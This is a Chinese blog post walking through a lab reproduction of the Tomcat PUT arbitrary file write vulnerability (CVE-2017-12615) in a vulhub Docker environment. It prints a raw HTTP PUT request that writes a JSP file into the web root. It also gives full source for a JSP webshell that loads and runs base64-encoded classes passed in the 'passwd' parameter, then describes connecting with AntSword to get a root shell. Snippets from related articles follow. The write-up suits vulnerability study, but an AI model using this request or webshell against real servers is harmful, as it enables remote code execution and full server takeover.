Tomcat8 任意写文件PUT方法 (CVE-2017-12615)

最新推荐文章于 2024-05-02 13:31:38 发布
最新推荐文章于 2024-05-02 13:31:38 发布
阅读量817 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42786460/article/details/133269429
版权

Tomcat 任意写文件PUT方法 (CVE-2017-12615)

文章目录

1 在线漏洞解读:

https://vulhub.org/#/environments/tomcat/CVE-2017-12615/

在这里插入图片描述

2 版本影响

​ Tomcat version: 8.5.19

3 环境搭建

cd /home/kali/vulhub/tomcat/CVE-2017-12615

在这里插入图片描述

环境启动:

sudo docker-compose up -d

sudo docker ps -a

已启动:访问端口8091

在这里插入图片描述

4 漏洞复现

4.1 访问

​ 4.1 访问http://192.168.225.166:8091/看到Tomcat示例页面,发现8.5.19版本后台管理是不允许登录的

在这里插入图片描述
在这里插入图片描述

4.2 POC攻击点
4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell
4.2.2 访问是否通,可以访问到文件

在这里插入图片描述

5 漏洞利用

5.1 上传jsp一句话
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
5.2 kali打开蚁剑:
┌──(kali💋kali)-[~]
└─$ sudo antsword
5.3 连接jsp一句话木马,密码为 passwd

在这里插入图片描述

5.4 打开终端,获取root

在这里插入图片描述

煜磊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
高版本Tomcat(8及以上)不支持PUT、DELETE方法
959
06-02 603
HiddenHttpMethodFilter进行请求过滤,实现Rest风格的url 1.Tomcat7及以下的版本: 在web.xml配置: <filter> <filter-name>hiddenHttpMethodFilter</filter-name> <filter-class>org.springframework.web.filter.HiddenHttpMethodFilter</filter-class> </filt
Tomcat PUT方法任意文件漏洞(CVE-2017-12615)
最新发布
weixin_45653478的博客
05-02 1031
在Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件任意位置,从而实现任意文件入。
Tomcat put方法任意文件上传漏洞(CVE-2017-12615)复现
君莫hacker的博客
09-15 7341
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现1. 访问主页2. 漏洞测试3. 上传jsp木马--命令执行4. 上传成功,执行命令5. 上传jsp一句话木马6. 上传成功,冰蝎连接0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 在一定条件下,攻击者可以利用这个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 漏洞编号 CV
idea中用rest风格发送delete,put请求报405(tomcat8)
qq_39954577的博客
04-11 490
项目场景: 问题描述: tomcat8中只能发送get,post请求,需要在跳转页面中加上isErrorPage=“true” 如果这个页面中有错误,封装到excption中 rest风格代码演示: 页面 <%--rest--%> <a href="book/1">查询图书</a> <form action="book/1" method="post"> <input type="submit" value="添加图书"&g
Tomcat8.0以上 不能使用put delete请求方式,报405错误解决
qq_45451150的博客
12-23 628
下面展示一些 内联代码片。 在jsp注释顶部加入:isErrorPage=“true” 即可 <%@ page contentType="text/html;charset=UTF-8" language="java" isErrorPage="true"%> <html> <head> <title>Title</title> </head> <body> <h1>ok</h1&gt
TomcatPUT的上传漏洞(CVE-2017-12615)
蚁景网安学院
10-17 644
近期在项目中碰到的ApacheTomcat中间件愈来愈多,于是乎。想着做一个整理。将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理复现。用作来巩固更新自己的知识库。...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
CVE-2017-12615利用脚本
04-16
CVE-2017-12615是一个在Apache Tomcat服务器中发现的安全漏洞,该漏洞允许攻击者通过PUT方法上传恶意文件并执行任意命令,从而对系统造成严重的安全威胁。这个漏洞主要涉及到Tomcat文件上传功能,特别是其处理...
Tomcat漏洞之——通过PUT远程代码执行
热门推荐
明月阁
09-26 1万+
原文链接:http://www.dubby.cn/detail.html?id=9034 本文仅为技术分享,任何利用里技术的行为都和本文无关。 这是Tomcat在2017.9.19日公布的一个漏洞:根据邮件描述,我们下了windows版tomcat 7.0.79,安装成功后,需要首先允许tomcat进行PUT操作,也就是修改/conf/web.xml:<servlet> <ser
Tomcat默认不支持restful风格的put与delete请求
langmian4982的博客
09-07 5329
方法tomcat 默认就是不允许PUT和DELETE的 如何配置Tomcat支持HTTP Delete和Put 方法tomcat web.xml文件中配置org.apache.catalina.servlets.DefaultServlet的 readonly false readonly参数默认是true,即不允许delete和put操作,所以通过XMLHttpReques
Tomcat PUT方法任意文件上传(CVE-2017-12615)
谢公子的博客
09-04 5180
目录 漏洞复现: 漏洞利用工具: 漏洞环境:当 Tomcat运行在Windows操作系统,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求上传任意文件,包括JSP类型的木马。影响范围:Apache Tomcat 7.0.0 - 7.0.81 漏洞复现: Tomcat版本:Tomcat 7.0.39...
tomcat 禁用trace,put,head,post,delete 请求方式
samz5906的专栏
04-10 1万+
背景  项目中请求方式只有GET,POST请求,处于安全考虑准备禁用TRACE,HEAD,PUT,DELETE,OPTIONS请求方式。实现 在tomcat的web.xml配置文件最后加上请求方式限制,配置如下,本次使用的tomcat8&lt;security-constraint&gt; &lt;web-resource-collection&gt; ...
Tomcat8.0以上不再支持PUT,DELETE解决方法
我是一名保安
03-17 1182
SpringMVC中使用REST风格,在使用PUT,DELETE请求方式时,过滤器和项目代码都没有错,但是还是一直报错405。 那是因为Tomcat8.0以上不再支持PUT,DELETE。 解决方法:在实现转发的jsp文件的首行添加: isErrorPage="true"就行了。 ## 害,今天又熬夜了。 ...
cve-2017-12615脚本
09-04
CVE-2017-12615是一个由Apache Tomcat服务器引起的漏洞,它存在于Tomcat服务器的默认配置中。该漏洞使得攻击者能够通过进行远程命令执行来获取服务器的控制权。 该脚本的实现过程如下: 1. 首先,通过发送特制的HTTP请求,攻击者可以将恶意的Web应用程序(如war文件)上传到Tomcat服务器中。 2. 接下来,攻击者发送另一个特制的HTTP请求,触发Tomcat服务器对上传的Web应用程序进行部署。 3. 当Tomcat服务器部署恶意的Web应用程序时,该程序中的恶意代码将被执行。 4. 攻击者可以在恶意代码中包含任意的系统命令,从而实现远程命令执行。 5. 一旦成功执行命令,攻击者就能够在服务器上执行各种操作,例如文件读取/入、系统信息获取等。 为了防御CVE-2017-12615漏洞,可以采取以下措施: 1. 及时更新和升级Apache Tomcat服务器,确保使用的版本没有漏洞。 2. 将Apache Tomcat和其他组件配置为具有最低特权,以减少潜在攻击者的影响范围。 3. 限制对Tomcat管理接口的访问,并使用强密码和多因素身份验证来保护管理接口。 4. 定期检查服务器上是否存在未知的应用程序文件或恶意代码,并将其删除。 5. 在Tomcat服务器上使用Web应用程序防火墙,以检测和阻止恶意HTTP请求。 6. 实施网络入侵检测系统(IDS)和入侵防御系统(IPS),以便及时检测和阻止攻击。 综上所述,CVE-2017-12615是一个严重的远程代码执行漏洞,攻击者通过利用该漏洞可以获取Tomcat服务器的控制权。为了避免受到此漏洞的攻击,我们必须采取一系列措施来确保Tomcat服务器的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值